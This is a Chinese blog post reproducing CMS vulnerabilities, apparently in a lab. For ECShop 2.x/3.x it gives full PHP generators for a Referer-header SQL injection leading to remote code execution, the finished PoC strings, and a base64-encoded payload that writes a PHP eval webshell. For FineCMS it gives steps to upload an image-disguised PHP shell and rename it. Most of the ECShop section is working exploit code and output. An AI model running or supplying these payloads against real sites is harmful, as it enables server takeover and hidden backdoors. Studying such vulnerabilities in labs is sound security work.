cms复现

已于 2022-09-03 16:31:58 修改
阅读量785 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全 php web安全
于 2022-07-14 23:15:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nareku/article/details/125786075
版权

Ecshop

漏洞原理

该漏洞产生的根本原因在于ECShop系统的user.php文件中,display函数的模板变量可控,导致注入,配合注入可达到远程代码执行的效果。使得攻击者无需登录等操作,直接可以获得服务器的权限。

漏洞利用

利用vulhub给出的脚本来生成poc

<?php 
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$test = sprintf("*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -", bin2hex($id), $shell);
$arr = array();
$arr["num"]=$test;
$arr["id"]=$id;

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

?>

得到poc
在这里插入图片描述
即如下:

POC for ECShop 2.x: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca POC for ECShop 3.x: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Ecshop2.x漏洞poc利用

在burp中抓包Ecshop用户登录页面,发送到重放器,然后将刚刚得到poc替换掉Referer原有的内容
在这里插入图片描述
证明漏洞利用成功。

Ecsho3.x漏洞poc利用

也是在burp中抓包Ecshop用户登录页面,发送到重放器,然后将刚刚得到poc替换掉Referer原有的内容
在这里插入图片描述
证明漏洞利用成功。

Getshell

生成获取WebShell的POC,代码如下:

<?php
$shell = bin2hex("{\$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk='));//}xxx");
$id = "-1' UNION/*";
$test = sprintf("*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -", bin2hex($id), $shell);
$arr = array();
$arr["num"]=$test;
$arr["id"]=$id;
$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>

file_put_contents(‘eval.php’,‘<?php eval($_POST[cmd]); ?>’) base64编码后为: ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=

得到poc

POC for ECShop 2.x: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca POC for ECShop 3.x: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Ecsho2.x:

套入POC利用,再用蚁剑即可连接
在这里插入图片描述
在这里插入图片描述

Ecshop3.x:

套入POC利用,再用蚁剑即可连接
在这里插入图片描述
在这里插入图片描述

wordpress

打靶过程中用到辽:传送门

dedecms

这个搭不好。。有空再补

finmeCMS

好难搭

漏洞复现

首先先注册一个账号,随后登录
随便看看,发现头像有上传功能
在这里插入图片描述
先上传一个正常图片
在这里插入图片描述
制作图片马
在这里插入图片描述
上传图片马并且抓包
在这里插入图片描述
将此处改成php,发包成功
在这里插入图片描述
可以在uploadfile/member/3文件夹中发现php文件
在这里插入图片描述
getshell
直接蚁剑连接即可

narukuuuu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cmseasy漏洞
qq_52223347的博客
03-10 4401
介绍 提供可视化编辑企业网站管理系统系统、网站模板、以及相关文档资料下载,网站系统完美运 行PHP7环境中。 官方网站: https://www.cmseasy.cn/ cmseasy_7.3.8 任意文件操作漏洞 cmseasy_7.6.3.2逻辑漏洞 "无需代码,自由拖拽布局,适应所有设备”是这个系统宣传的特色,后台自然地 存在自定义网站模板功能,这种功能中如果处理不当很可能造成文件任意读、写 或者删除的脆弱性问题,需要着重注意。 一 任意文件操作漏洞 进入管理界面–》模块 --》编辑模
127.网络安全渗透测试—[CMS后台 getwebshell]—[ecshop3.6后台 getwebshell]
qwsn
07-11 2698
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 进入后台,访问该页面:抓包,送入repeater模块,改为post模式,把此时请求体的act=edit_templates,放到get处请求体写入以下内容:(写入test.php,密码为a) ,然后点击订单列表—>点击查看—>点击,从而生成test.php蚁剑访问连接...
CMS漏洞
qq_44832048的博客
07-19 9777
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
Web安全 EmpireCMS漏洞常见漏洞分析及,2024年最新三幅图给你弄懂EventBus核心原理
最新发布
qq194582923的博客
04-15 1275
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8428
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
Phpcms V9.6.0任意文件写入getshell
主题模板站的博客
01-21 579
PHPcms v9.6的任意文件上传的漏洞,已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实任意文件上传。phpcms v9.6正常部署phpcms v9.6就好。过程中,可以在用户注册页面通过POST提交:在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程,这次我来正向的分析一下这个洞。首先看到用户注册的模块,位于phpcms/modules/member/index.php的register方法中。代码很多,一点点往下看:完成了
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL 注入漏洞后台 本节将对 74CMS 3.0 SQL 注入漏洞后台进行详细分析,首先介绍了攻击环境的搭建,然后对代码进行了详细的审计,最后对漏洞进行了分析。 一、搭建攻击环境 为了进行攻击,我们需要搭建...
一马CMS 1.0
04-30
一马CMS,是全力专注于ASP伪静态的ASP免费源码,是国内唯一专注于asp伪静态源码程序,完全免费,使用简单,文件小,有利于SEO。 后台管理:adm/default.asp 管理员和密码都是admin 作者因为发在市场上...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74cmsv6.0.20.zip
07-23
综上所述,这个74cmsv6.0.20.zip压缩包提供了一个完整的74CMS 6.0.20安装包,用户需要遵循安装说明,处理好环境的细节,将upload文件夹的内容上传到服务器,并应用伪静态规则来优化网站的URL结构。在实际操作中...
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
phpcms9-6-0 一键getshell工具
ai74583的博客
04-10 1012
介绍 一键化python 1.py http://xxx.com,如果是批量直接运行py文件即可 待办 [] 加入对有验证码phpcms网站的支持 [] 加入批量(已完成) 说明 依赖库的安装pip install requests 代码 # -*- coding:utf-8 -*- ''' ---------------------- Author : Akkuman Bl...
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1378
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
ECShop-v3.0.0漏洞
weixin_50866517的博客
08-16 1554
ECShop-v3.0.0漏洞配置文件写入导致代码执行二级目录三级目录 配置文件写入导致代码执行 在\ECShop -v3.0.0\install\index.php文件的第207-227行中,使用POST请求接收配置信息的值,并且直接传入到create_config_file方法。 case 'create_config_file' : $db_host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '';
网站后台getshell的方法总结
anlalu233的博客
03-24 4824
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张...
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2265
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
ecshop文章频道,ecshop文章cms系统,ecshop的CMS文章频道页插件,ECSHOP模板堂CMS文章频道插件
程序发烧猿's Blog
03-02 163
该文章频道页面美观大方,模板丰富,布局合理,更利于搜索引擎的收录。良好清晰的文章页结构布局,更利于搜索引擎蜘蛛抓取,让蜘蛛恋上你的网站。用了此插件更有利于提高您站的各大搜索引擎的搜索排名,绝对是一个ECSHOP必不可少的利器。
帝国cms7.5垂直越权漏洞
01-02
根据提供的引用内容,帝国CMS 7.5版本及之前版本存在一个垂直越权漏洞,通过修改数据库表名可以实任意代码执行。下面是帝国CMS 7.5垂直越权漏洞的步骤: 1. 使用管理员账户登录帝国CMS后台。 2. 访问以下URL:`/e/admin/admin/ebak/phome.php`。 3. 在URL中修改数据库表名,以实任意代码执行。 请注意,这是一个漏洞的示例,仅用于安全研究和教育目的。在实际环境中,请遵循合法和道德的行为准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值